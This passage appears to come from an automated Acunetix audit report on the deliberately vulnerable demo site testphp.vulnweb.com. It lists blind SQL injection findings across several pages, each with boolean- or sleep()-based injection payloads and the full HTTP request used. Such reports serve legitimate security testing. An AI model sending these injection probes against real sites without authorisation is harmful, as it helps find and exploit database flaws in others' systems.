Cookie input login was set to test%2Ftest' AND 3*2*1=6 AND '000QXwt'='000QXwt Tests performed: - test%2Ftest' AND 2*3*8=6*8 AND '000QXwt'='000QXwt => TRUE- test%2Ftest' AND 2*3*8=6*9 AND '000QXwt'='000QXwt => FALSE- test%2Ftest' AND 3*3<(2*4) AND '000QXwt'='000QXwt => FALSE- test%2Ftest' AND 3*2>(1*5) AND '000QXwt'='000QXwt => TRUE- test%2Ftest' A ... (line truncated)
GET /artists.php HTTP/1.1
Cookie: login=test%2Ftest'%20AND%203*2*1=6%20AND%20'000QXwt'='000QXwt;
PHPSESSID=c3e1qcecc963h1hoij3o57aik0; OAID=X3285C893B9A5D126A7E0F8151CC99234;
mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/cart.php
Details
URL encoded POST input addcart was set to(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ Tests performed: - (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/ => 3.447s- (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0) ... (linetruncated)
POST /cart.php?del=2 HTTP/1.1
Content-Length: 130
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
addcart=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'"%
2b(select(0)from(select(sleep(0)))v)%2b"*/
Request headers
/cart.php
Details
URL encoded POST input addcart was set toif(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Tests performed: - if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ =>4.555 s- if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR" ...(line truncated)
28Acunetix Website Audit
POST /cart.php HTTP/1.1
Content-Length: 142
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
addcart=if(now()=sysdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate()%2csleep(0)%2c0))OR'"
XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"*/&price=800
Request headers
/cart.php
Details
Cookie input login was set to test%2Ftest' AND 3*2*1=6 AND '000g1Fy'='000g1Fy Tests performed: - test%2Ftest' AND 2*3*8=6*8 AND '000g1Fy'='000g1Fy => TRUE- test%2Ftest' AND 2*3*8=6*9 AND '000g1Fy'='000g1Fy => FALSE- test%2Ftest' AND 3*3<(2*4) AND '000g1Fy'='000g1Fy => FALSE- test%2Ftest' AND 3*2>(1*5) AND '000g1Fy'='000g1Fy => TRUE- test%2Ftest' A ... (line truncated)
GET /cart.php HTTP/1.1
Cookie: login=test%2Ftest'%20AND%203*2*1=6%20AND%20'000g1Fy'='000g1Fy;
PHPSESSID=c3e1qcecc963h1hoij3o57aik0; OAID=X3285C893B9A5D126A7E0F8151CC99234;
mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/guestbook.php
Details
Cookie input login was set to test%2Ftest' AND 3*2*1=6 AND '000W8lE'='000W8lE Tests performed: - test%2Ftest' AND 2*3*8=6*8 AND '000W8lE'='000W8lE => TRUE- test%2Ftest' AND 2*3*8=6*9 AND '000W8lE'='000W8lE => FALSE- test%2Ftest' AND 3*3<(2*4) AND '000W8lE'='000W8lE => FALSE- test%2Ftest' AND 3*2>(1*5) AND '000W8lE'='000W8lE => TRUE- test%2Ftest' A ... (line truncated)
GET /guestbook.php HTTP/1.1
Cookie: login=test%2Ftest'%20AND%203*2*1=6%20AND%20'000W8lE'='000W8lE;
PHPSESSID=c3e1qcecc963h1hoij3o57aik0; OAID=X3285C893B9A5D126A7E0F8151CC99234;
mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Request headers
29Acunetix Website Audit
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/listproducts.php
Details
URL encoded GET input artist was set to -1 OR 3*2*1=6 AND 00053=00053 -- Tests performed: - -1 OR 2+53-53-1=0+0+0+1 -- => TRUE- -1 OR 3+53-53-1=0+0+0+1 -- => FALSE- -1 OR 3*2<(0+5+53-53) -- => FALSE- -1 OR 3*2>(0+5+53-53) -- => FALSE- -1 OR 2+1-1-1=1 AND 00053=00053 -- => TRUE- -1 OR 00053=00053 AND 3+1-1-1=1 -- => [bold ... (line truncated)
GET /listproducts.php?artist=-1%20OR%203*2*1=6%20AND%2000053=00053%20--%20 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/listproducts.php
Details
URL encoded GET input cat was set to 1 AND 3*2*1=6 AND 46=46 Tests performed: - 1*1*1*1 => TRUE- 1*46*41*0 => FALSE- 11*5*2*999 => FALSE- 1*1*1 => TRUE- 1*1*1*1*1*1 => TRUE- 11*1*1*0*1*1*46 => FALSE- 1 AND 5*4=20 AND 46=46 => TRUE- 1 AND 5*4=21 AND 46=46 => FALSE- 1 AN ... (line truncated)
GET /listproducts.php?artist=1&cat=1%20AND%203*2*1=6%20AND%2046=46 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/listproducts.php
30Acunetix Website Audit
Details
URL encoded GET input cat was set to -1 OR 3*2*1=6 AND 000291=000291 -- Tests performed: - -1 OR 2+291-291-1=0+0+0+1 -- => TRUE- -1 OR 3+291-291-1=0+0+0+1 -- => FALSE- -1 OR 3*2<(0+5+291-291) -- => FALSE- -1 OR 3*2>(0+5+291-291) -- => FALSE- -1 OR 2+1-1-1=1 AND 000291=000291 -- => TRUE- -1 OR 000291=000291 AND 3+1-1-1=1 - ... (line truncated)
GET /listproducts.php?cat=-1%20OR%203*2*1=6%20AND%20000291=000291%20--%20 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/listproducts.php
Details
Cookie input login was set to test%2Ftest' AND 3*2*1=6 AND '000Si5V'='000Si5V Tests performed: - test%2Ftest' AND 2*3*8=6*8 AND '000Si5V'='000Si5V => TRUE- test%2Ftest' AND 2*3*8=6*9 AND '000Si5V'='000Si5V => FALSE- test%2Ftest' AND 3*3<(2*4) AND '000Si5V'='000Si5V => FALSE- test%2Ftest' AND 3*2>(1*5) AND '000Si5V'='000Si5V => TRUE- test%2Ftest' A ... (line truncated)
GET /listproducts.php HTTP/1.1
Cookie: login=test%2Ftest'%20AND%203*2*1=6%20AND%20'000Si5V'='000Si5V;
PHPSESSID=c3e1qcecc963h1hoij3o57aik0; OAID=X3285C893B9A5D126A7E0F8151CC99234;
mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/Mod_Rewrite_Shop/buy.php
Details
URL encoded GET input id was set to 1 AND 3*2*1=6 AND 736=736 Tests performed: - 1*1*1*1 => TRUE- 1*736*731*0 => FALSE- 11*5*2*999 => FALSE- 1*1*1 => TRUE- 1*1*1*1*1*1 => TRUE- 11*1*1*0*1*1*736 => FALSE- 1 AND 5*4=20 AND 736=736 => TRUE- 1 AND 5*4=21 AND 736=736 => FALSE... (line truncated)
31Acunetix Website Audit
GET /Mod_Rewrite_Shop/buy.php?id=1%20AND%203*2*1=6%20AND%20736=736 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/Mod_Rewrite_Shop/details.php
Details
URL encoded GET input id was set to 1 AND 3*2*1=6 AND 655=655 Tests performed: - 1*1*1*1 => TRUE- 1*655*650*0 => FALSE- 11*5*2*999 => FALSE- 1*1*1 => TRUE- 1*1*1*1*1*1 => TRUE- 11*1*1*0*1*1*655 => FALSE- 1 AND 5*4=20 AND 655=655 => TRUE- 1 AND 5*4=21 AND 655=655 => FALSE... (line truncated)
GET /Mod_Rewrite_Shop/details.php?id=1%20AND%203*2*1=6%20AND%20655=655 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/Mod_Rewrite_Shop/rate.php
Details
URL encoded GET input id was set to 1 AND 3*2*1=6 AND 259=259 Tests performed: - 1*1*1*1 => TRUE- 1*259*254*0 => FALSE- 11*5*2*999 => FALSE- 1*1*1 => TRUE- 1*1*1*1*1*1 => TRUE- 11*1*1*0*1*1*259 => FALSE- 1 AND 5*4=20 AND 259=259 => TRUE- 1 AND 5*4=21 AND 259=259 => FALSE... (line truncated)
GET /Mod_Rewrite_Shop/rate.php?id=1%20AND%203*2*1=6%20AND%20259=259 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZP
Request headers
32Acunetix Website Audit
e08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/product.php
Details
Cookie input login was set to test%2Ftest' AND 3*2*1=6 AND '000Yusl'='000Yusl Tests performed: - test%2Ftest' AND 2*3*8=6*8 AND '000Yusl'='000Yusl => TRUE- test%2Ftest' AND 2*3*8=6*9 AND '000Yusl'='000Yusl => FALSE- test%2Ftest' AND 3*3<(2*4) AND '000Yusl'='000Yusl => FALSE- test%2Ftest' AND 3*2>(1*5) AND '000Yusl'='000Yusl => TRUE- test%2Ftest' A ... (line truncated)
GET /product.php HTTP/1.1
Cookie: login=test%2Ftest'%20AND%203*2*1=6%20AND%20'000Yusl'='000Yusl;
PHPSESSID=c3e1qcecc963h1hoij3o57aik0; OAID=X3285C893B9A5D126A7E0F8151CC99234;
mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/product.php
Details
URL encoded GET input pic was set to 4 AND 3*2*1=6 AND 751=751 Tests performed: - 1*1*1*4 => TRUE- 4*751*746*0 => FALSE- 14*5*2*999 => FALSE- 4*1*1 => TRUE- 1*1*1*1*1*4 => TRUE- 14*1*1*0*1*1*751 => FALSE- 4 AND 5*4=20 AND 751=751 => TRUE- 4 AND 5*4=21 AND 751=751 => FALSE[/li ... (line truncated)
GET /product.php?pic=4%20AND%203*2*1=6%20AND%20751=751 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/search.php
33Acunetix Website Audit
Details
Cookie input login was set to test%2Ftest' AND 3*2*1=6 AND '000EGt5'='000EGt5 Tests performed: - test%2Ftest' AND 2*3*8=6*8 AND '000EGt5'='000EGt5 => TRUE- test%2Ftest' AND 2*3*8=6*9 AND '000EGt5'='000EGt5 => FALSE- test%2Ftest' AND 3*3<(2*4) AND '000EGt5'='000EGt5 => FALSE- test%2Ftest' AND 3*2>(1*5) AND '000EGt5'='000EGt5 => TRUE- test%2Ftest' A ... (line truncated)
GET /search.php HTTP/1.1
Cookie: login=test%2Ftest'%20AND%203*2*1=6%20AND%20'000EGt5'='000EGt5;
PHPSESSID=c3e1qcecc963h1hoij3o57aik0; OAID=X3285C893B9A5D126A7E0F8151CC99234;
mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/search.php
Details
URL encoded POST input searchFor was set toif(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Tests performed: - if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ =>3.448 s- if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))O ... (linetruncated)
POST /search.php?test=query HTTP/1.1
Content-Length: 146
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
goButton=go&searchFor=if(now()=sysdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate()%2cslee
p(0)%2c0))OR'"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"*/
Request headers
/search.php
Details
URL encoded POST input searchFor was set toif(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Tests performed: - if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ =>3.557 s- if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))O ... (linetruncated)
34Acunetix Website Audit
POST /search.php?test=1 HTTP/1.1
Content-Length: 134
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
searchFor=if(now()=sysdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate()%2csleep(0)%2c0))OR
'"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"*/
Request headers
/search.php
Details
URL encoded GET input test was set to(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ Tests performed: - (select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/ => 9.547s- (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v) ... (linetruncated)
POST
/search.php?test=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0))
)v)%2b'"%2b(select(0)from(select(sleep(0)))v)%2b"*/ HTTP/1.1
Content-Length: 22
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
goButton=go&searchFor=
Request headers
/search.php
Details
URL encoded GET input test was set to(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ Tests performed: - (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ => 6.458s- (select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v) ... (linetruncated)
POST
/search.php?test=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0))
)v)%2b'"%2b(select(0)from(select(sleep(0)))v)%2b"*/ HTTP/1.1
Request headers
35Acunetix Website Audit
Content-Length: 11
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
searchFor=1
/secured/newuser.php
Details
URL encoded POST input uuname was set to -1' OR 3*2*1=6 AND 000770=000770 -- Tests performed: - -1' OR 2+770-770-1=0+0+0+1 -- => TRUE- -1' OR 3+770-770-1=0+0+0+1 -- => FALSE- -1' OR 3*2<(0+5+770-770) -- => FALSE- -1' OR 3*2>(0+5+770-770) -- => FALSE- -1' OR 2+1-1-1=1 AND 000770=000770 -- => TRUE- -1' OR 000770=000770 AND ... (line truncated)
POST /secured/newuser.php HTTP/1.1
Content-Length: 231
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
